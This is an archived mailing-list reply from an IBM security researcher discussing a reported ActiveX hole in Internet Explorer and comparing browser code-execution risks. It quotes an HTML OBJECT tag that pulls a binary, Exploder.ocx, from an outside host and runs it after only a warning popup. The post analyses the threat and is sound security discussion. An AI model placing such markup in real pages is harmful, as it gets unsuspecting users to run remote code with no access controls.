[Previous] [Next] [Index]
[Thread]
Re: ActiveX security hole reported.
I haven't tried it either, not having IE handy, but it
looks quite convincing. I'm told that it pops up some
warnings about "this thing is not signed and may contain
a virus", but of course most people always push "OK"
on those out of habit.
This seems to be a step across a certain line. Recently
I've been telling people that you can generally choose
between:
- Things like Java and JavaScript, where you can
unknowingly download and run stuff from a stranger
with a single button-click, but at least it runs
under a virtual machine that's designed to impose
some controls, or
- Things like normal binaries and ActiveX, where
the things run on the bare metal with no access
controls, but you have to take at least one
action *outside* your browser to run them.
(The main exception being if you have Word set up as
your viewer for Word documents; then you can get a
virus directly from the browser by just clicking on
an infected DOC file.)
This stuff, though:
<A HREF="http://home.netscape.com/comprod/mirror/index.htm">
<OBJECT ID="Exploder1" WIDTH=86 HEIGHT=31
CODEBASE="http://www.halcyon.com/mclain/ActiveX/Exploder.ocx"
CLASSID="CLSID:DE70D9E3-C55A-11CF-8E43-780C02C10128">
<PARAM NAME="_Version" VALUE="65536">
<PARAM NAME="_ExtentX" VALUE="2646">
<PARAM NAME="_ExtentY" VALUE="1323">
<PARAM NAME="_StockProps" VALUE="0">
<IMG SRC="../../images/now20_button.gif" WIDTH=88 HEIGHT=31></OBJECT></A>
is new to me. It seems to be instructing IE to download
the Exploder.ocx binary, and run it (after giving the user
some little popup warnings to make sure he didn't click
by accident). Does anyone have a pointer to the semantics
of this sort of <OBJECT> tag?
- -- -
David M. Chess | Remember:
High Integrity Computing Lab | it's your pineal gland,
IBM Watson Research | but it's their antenna!
Follow-Ups: